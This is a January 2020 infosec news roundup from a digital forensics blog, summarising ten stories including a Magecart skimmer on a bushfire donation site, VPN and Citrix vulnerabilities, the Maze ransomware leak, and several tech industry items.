AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 1/14/2020

1 – Australia Bushfire Donors Affected by Credit Card Skimming Attack

Attackers have compromised a website collecting donations for the victims of the Australia bushfires and injected a malicious script that steals the payment information of the donors. This type of attack is called Magecart and involves hackers compromising a web site and injecting malicious JavaScript into eCommerce or checkout pages. These scripts will then steal any credit cards or payment information that is submitted and send it off to a remote site under the attacker’s control. The Malwarebytes Threat Intelligence Team has discovered a legitimate web site collecting donations for the tragic bushfires in Australia that has been compromised by a Magecart script.


2 – Continued Exploitation of Pulse Secure VPN Vulnerability

Unpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix a remote code execution (RCE) vulnerability, known as CVE-2019-11510, can become compromised in an attack.  Although Pulse Secure disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. CISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes.


3 – Tesla is challenging hackers to crack its car, and it is putting ~$1 million on the line

Tesla has been investing more in its cybersecurity over the last few years, and now it is returning to Pwn2Own to challenge hackers to crack its cars with ~$1 million on the line and a few Model 3 vehicles.  Last year, Tesla went to Vancouver for Pwn2Own, which is a hacking competition run by Trend Micro’s Zero Day Initiative (ZDI). It offered a Model 3 to whoever manages to find and exploit certain vulnerabilities in the vehicle’s system. A hacking duo targeted the infotainment system on the Tesla Model 3 and used “a JIT bug in the renderer” to manage to take control of the system. They left with a brand new Model 3.


4 – Proof-of-concept code published for Citrix bug as attacks intensify

Starting with yesterday, there is now public proof-of-concept exploit code for CVE-2019-19781, a vulnerability in Citrix enterprise equipment that can allow hackers to take over devices and access a companies’ internal networks. The vulnerability is as bad as it gets and has been deemed one of the most dangerous bugs disclosed in recent years. Codenamed Shitrix by the larger infosec community, this vulnerability impacts Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway.


5 – Maze Ransomware Publishes 14GB of Stolen Southwire Files

The Maze Ransomware operators have released an additional 14GB of files that they claim were stolen from one of their victims for not paying a ransomware demand. In December the Maze Ransomware operators attacked Southwire, a wire and cable manufacturer out of Georgia, and allegedly stole 120GB worth of files before encrypting 878 devices on the network. Maze then demanded $6 million in bitcoins or they would publicly release Southwire’s stolen files. When Southwire did not make a payment, the Maze operators uploaded some of the company’s files to a “News” site that they had created to shame non-paying victims.


6 – Facebook Says Encrypting Messenger by Default Will Take Years

In March of last year, Mark Zuckerberg made a dramatic pledge: Facebook would apply end-to-end encryption to user communications across all of its platforms by default. The move would grant strong new protections to well over a billion users. It’s also not happening anytime soon. What Zuckerberg didn’t spell out at the time is just how difficult that transition would be to pull off, and not just in terms of political hurdles from encryption-averse law enforcement or a shift in Facebook’s business model. Encrypting Facebook Messenger alone represents a Herculean technical challenge. According to one of the Facebook engineers leading the effort, a version of Messenger that’s fully end-to-end encrypted by default remains years away.


7 – Computers Are Learning to See in Higher Dimensions

Computers can now drive cars, beat world champions at board games like chess and Go, and even write prose. The revolution in artificial intelligence stems in large part from the power of one particular kind of artificial neural network, whose design is inspired by the connected layers of neurons in the mammalian visual cortex. These “convolutional neural networks” (CNNs) have proved surprisingly adept at learning patterns in two-dimensional data—especially in computer vision tasks like recognizing handwritten words and objects in digital images.


8 – CES 2020: Neon is an ‘artificial human’ that Samsung wants to be your friend

One of the most unique tech projects unveiled at CES 2020 this year is Neon, an “artificial human” designed by the Samsung Technology and Advanced Research Labs (STAR Labs). Neon is basically a humanoid artificial intelligence (AI) avatar that looks like a human and can respond to questions in almost real time while giving expressions such as a smile or a raised eyebrow while doing so. It’s a chat bot, but it isn’t a true AI assistant—it’s not intended to be all-knowing. You can’t ask it what year Elvis Presley died (1977), or which breed of dog is best (golden retriever) and expect an answer. Instead, the bot is there to keep someone company and serve as a friend.


9 – Don’t trust the US gov’t, states tell court in T-Mobile/Sprint merger case

The United States government approved the T-Mobile/Sprint merger without fully investigating whether the deal’s anti-competitive harms can be offset by merger conditions, state attorneys general argued in a court filing. The US approved the merger on the conditions that the merging companies deploy 5G nationwide and sell spectrum licenses and other assets to Dish Network to help Dish create a new mobile service. With states having sued the companies to block the merger, the DOJ and FCC last month urged the court to reject the lawsuit and trust the federal government’s conclusions.


10 – Apple denies Barr’s request to unlock Pensacola shooter’s iPhones

In a statement issued to Input late today, Apple rebutted Barr’s characterization of the situation, saying it has responded to all law enforcement requests for help in the extraction data from two iPhones belonging to Mohammed Saeed Alshamrani. Alshamrani is suspected of gunning down three sailors and injuring eight others in an attack at the Naval Air Station in December. “We reject the characterization that Apple has not provided substantive assistance in the Pensacola investigation. Our responses to their many requests since the attack have been timely, thorough and are ongoing,” Apple says. The company promised to continue to provide assistance to the Federal Bureau of Investigation operation as the case evolves.

Related Posts